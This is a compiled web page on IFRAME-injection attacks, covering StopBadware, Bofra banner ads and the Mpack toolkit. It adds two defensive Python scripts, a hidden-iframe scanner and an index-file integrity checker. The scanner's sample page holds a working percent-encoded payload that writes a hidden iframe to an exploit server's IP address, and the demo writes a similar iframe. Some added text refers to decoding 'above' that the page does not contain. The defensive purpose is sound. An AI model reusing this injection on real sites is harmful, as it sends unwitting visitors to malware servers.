Stop Badware, yesterday at least, was stopping Berkman.
Which is deeply ironic, given what the StopBadware initiative was set
up to do. But in a way, it only goes to underscore how complex and dangerous
our software monoculture has become.
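The decoding Ethan did by hand above is the check a site operator wants to run over every index document, and it is easy to automate. The following is an added example, not code from this page or from any of the people quoted on it: a small Python scanner that rewrites each document.write(unescape('...')) call into the markup the browser would have written, then lists every iframe whose src points off-site and whose framing is hidden (a box of one pixel or less, or CSS display:none / visibility:hidden). It goes slightly beyond the quoted case by also handling the %uXXXX form that JavaScript's unescape() accepts and by catching plain, unobfuscated hidden iframes. The page it scans is constructed for the example: it embeds the same percent-encoded payload quoted above plus two plain iframes, one legitimate and one hidden. The host names example.com, maps.example.org and evil.example.net are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page: the percent-encoded document.write(unescape(...))
# injection quoted above, one legitimate visible iframe, one plain hidden iframe.
# The host names example.com / maps.example.org / evil.example.net are assumed.
SAMPLE_PAGE = """<html><head><title>home</title>
<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E'
) );</script>
</head><body>
<iframe src="http://maps.example.org/embed" width="400" height="300"></iframe>
<iframe src="http://evil.example.net/in.php" style="display:none"></iframe>
</body></html>"""

# document.write(unescape('...')) with either quote style, possibly spanning lines.
UNESCAPE_RE = re.compile(
    r"""document\.write\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""",
    re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="v", name='v' or bare name=v (the injected tag uses bare src= and name=).
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s):
    """Decode what JavaScript unescape() would: %uXXXX code units, then %XX bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def deobfuscate(html):
    """Replace each document.write(unescape('...')) call with the markup it would emit."""
    return UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), html)


def parse_attrs(attr_text):
    """Attribute name -> value for one tag; names are lower-cased."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    """Framing used to keep the exploit page out of sight: <=1px box or CSS hiding."""
    def tiny(v):
        v = (v or "").strip().lower().rstrip("px").strip()
        return v.isdigit() and int(v) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((tiny(attrs.get("width")) and tiny(attrs.get("height")))
            or "display:none" in style or "visibility:hidden" in style)


def find_suspicious_iframes(html, site_host):
    """List (src, host, 'plain'|'obfuscated') for hidden iframes that load an off-site page."""
    findings = []
    for m in IFRAME_RE.finditer(deobfuscate(html)):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "").strip()
        host = urlsplit(src).hostname or ""
        if host and host != site_host.lower() and is_hidden(attrs):
            # A tag that exists only after decoding was hidden behind unescape().
            how = "plain" if m.group(0) in html else "obfuscated"
            findings.append((src, host, how))
    return findings


if __name__ == "__main__":
    for src, host, how in find_suspicious_iframes(SAMPLE_PAGE, "example.com"):
        print(f"{how:10s} {host:20s} {src}")
```

For a real site, read each index document and call find_suspicious_iframes(text, "your-site-host"); any hit is a compromised page, not a false positive to tune away. The decoder only unwraps the unescape() packer seen here; other packers (String.fromCharCode, eval over concatenated strings) would need their own handling, which is why a content scanner like this should sit beside an integrity baseline of the index files rather than replace it.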
Banner ads appearing on popular European web sites have been directing
traffic to sites that install malware on visitors' computers, according
to the Internet Storm Center. The attacks are exploiting an unpatched flaw
in the way Internet Explorer 6 handles the IFRAME tag.
"Some high profile sites with banner ads are linking to servers that
have the exploit and malicious code," according to an advisory on the
ISC web site. The attack is an expanded version of banner-based exploits
that first surfaced earlier this year. Banner networks, with their ability
to place code on hundreds of outside sites, offer a vehicle for the
rapid distribution of trojans and other malware, as well as a way to
deface web pages. It is not clear whether the malicious code was being
spread through a compromised ad server, or through specific banners
submitted to ad networks.
Site operators are being cautioned to verify that the banners do
not contain the IFRAME exploit code, or failing that, temporarily disable
banner ads to minimize the risk of accidentally infecting users and
propagating the exploit. The ISC did not identify any of the affected
sites.
Users clicking on the banners are being infected with variants of the
Bofra worm that has been propagating through e-mail and malicious
web sites. Bofra appeared just days after the revelation of the IFRAME
vulnerability, which affects Internet Explorer 6 on all Windows platforms
except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers
to gain complete control of a user's computer.
on-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.asp
But the best you can do:
For home users:
* Beware of pages that require software installation. Do not allow new software
installation from your browser unless you absolutely trust both the Web page
and the provider of the software.
* Scan with an updated antivirus and anti-spyware software any program downloaded
through the Internet. This includes any downloads from P2P networks, through
the Web and any FTP server regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never
open attachments or click on links contained in these email messages.
* Enable the “Automatic Update” feature in your Windows operating system and
apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it
is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html
Several hundred pornography sites are surprising unwitting users with a smorgasbord
of exploits via Mpack, the already notorious hacker toolkit that launched
massive attacks earlier this week from a network of more than 10,000 compromised
domains.
Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous
content -- that have either been hacked or are purposefully redirecting users
to servers hosting Mpack, a professional, Russian-made collection of exploits
that comes complete with a management console.
Even though there are far fewer porn sites in this newly discovered infection
chain than in Monday's "Italian Job" attack -- called that because most of the
10,000+ hijacked sites were legitimate Italian domains -- they've managed to
infect twice as many end-users' PCs, said Trend Micro in a posting to its malware
blog.
"Right now, we are not sure whether the porn sites are compromised to host
the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged
Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and
have shared some of their findings. Symantec, for instance, asked how hackers
were able to infect so many sites in such a short time, and how they could inject
the necessary IFRAMES code -- the malicious code they added to the legitimate
sites' HTML that redirected visitors to the Mpack server -- so quickly.
"The MPack gang appears to be using an IFRAME manager tool to automate the
task on a large scale," said Amado Hidalgo, a Symantec security analyst. The
tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end
database, regularly checks a large list of sites to inject the malicious IFRAME
code.
Hidalgo also spelled out how hackers have been getting into legitimate sites,
which puzzled investigators earlier this week. "It takes as input a list of
Web site administrator accounts, possibly obtained in the black market," he
said. Those administrator accounts are recorded in MySQL, and the manager can
be left running so that it re-infects sites that have been purged of the IFRAMES
code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The
site administrator's credentials need to be changed."
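Hidalgo's point that a purged page simply gets re-infected argues for watching the index documents themselves, continuously, rather than cleaning them once. The following is an added example, not Symantec's tool or code from this page: a Python baseline check that hashes every index.php / index.html / index.htm / index.shtml under a web root, stores the digests in a JSON file that should live outside the web root and outside the FTP account's reach, and on each later run reports which index documents were modified, added or removed. The demo() function builds a throwaway two-page site in a temporary directory and simulates a visit by the IFRAME manager (one index appended to, one replaced by a differently named index file, a non-index page left alone); all of that content is constructed for the example. Changing the harvested administrator credentials, as Hidalgo advises, remains the actual fix; this only tells you within one cron interval that the manager has come back.

```python
import hashlib
import json
import os
import tempfile

# Documents the IFRAME manager is reported to rewrite; other files are ignored.
INDEX_NAMES = ("index.php", "index.html", "index.htm", "index.shtml")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(webroot):
    """Map each index document under webroot (POSIX-style relative path) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower() in INDEX_NAMES:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def save_baseline(baseline, path):
    # Keep the baseline outside the web root and outside the FTP account:
    # whoever can rewrite index.html must not be able to rewrite the record of it.
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def check_against_baseline(webroot, baseline):
    """Return {relative_path: 'modified' | 'added' | 'missing'} for index documents that changed."""
    current = build_baseline(webroot)
    changes = {}
    for rel, digest in current.items():
        if rel not in baseline:
            changes[rel] = "added"
        elif baseline[rel] != digest:
            changes[rel] = "modified"
    for rel in baseline:
        if rel not in current:
            changes[rel] = "missing"
    return changes


def demo():
    """Constructed run: baseline a two-page site, then simulate an IFRAME-manager visit."""
    with tempfile.TemporaryDirectory(prefix="webroot-") as root:
        os.makedirs(os.path.join(root, "blog"))
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<html><body>Welcome</body></html>\n")
        with open(os.path.join(root, "blog", "index.php"), "w") as f:
            f.write("<?php include 'theme.php'; ?>\n")
        with open(os.path.join(root, "blog", "post.html"), "w") as f:
            f.write("<html><body>not an index document</body></html>\n")
        baseline = build_baseline(root)
        assert check_against_baseline(root, baseline) == {}
        # The manager appends a hidden iframe to one index, swaps another for a
        # differently named index file, and leaves the non-index page untouched.
        with open(os.path.join(root, "index.html"), "a") as f:
            f.write('<iframe src="http://81.95.146.98/index.html" '
                    'width="1" height="1"></iframe>\n')
        os.remove(os.path.join(root, "blog", "index.php"))
        with open(os.path.join(root, "blog", "index.shtml"), "w") as f:
            f.write("<html><body>replaced</body></html>\n")
        return check_against_baseline(root, baseline)


if __name__ == "__main__":
    for rel, status in sorted(demo().items()):
        print(status, rel)
```

For a real site, call build_baseline(webroot) once after a verified clean-up, save_baseline() the result somewhere the web server's and FTP user's accounts cannot write, and run check_against_baseline() from cron; a non-empty result means the page has been rewritten again and the credentials are still in the attackers' list.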
Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found
delivering the malicious IFRAMES code, and found that the overwhelming majority
-- 98 percent to be exact -- were running the Apache Web server. "The servers
targeted in this attack have almost exclusively been running some flavor of
Apache on Unix," said Sophos in a blog entry Friday. That's not always
the case, said Ron O'Brien, senior
security analyst at Sophos. "Overall, hacked sites are about evenly split between
Apache and [Microsoft] IIS servers, but in this subset it's almost entirely
Apache." Another interesting factoid, said O'Brien: "Of all the sites we've
tracked that serve malicious code, about 80 percent have been hacked."
Still other researchers rooted out details of Mpack, including its price
and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's
rapid response team, said Mpack sells for around US$1,000, and that the man
[or woman] behind it goes by "$ash" in the Russian hacker underground. The latest
version of Mpack, .90, includes exploits for eight different vulnerabilities,
six of them flaws in Windows or Internet Explorer, including the dangerous ANI
bug that affected Vista earlier this year.
"This is a powerful Web exploitation tool," Dunham said.
Copyright © 1996-2008 by Dr. Nikolai Bezroukov. www.softpanorama.org was
created as a service to the UN Sustainable Development Networking Programme (SDNP)
in the author's free time.
This document is an industrial compilation designed and created exclusively
for educational use and is placed under the copyright of the Open Content
License (OPL). Original materials copyright belongs to respective owners.
Quotes are made for educational purposes only in compliance with the fair
use doctrine.
Standard disclaimer: The statements, views and opinions presented on this
web page are those of the author and are not endorsed by, nor do they
necessarily reflect, the opinions of the author's present and former
employers, SDNP or any other organization the author may be associated
with. We do not warrant the correctness of the information provided or
its fitness for any purpose.
Last modified: November 08, 2008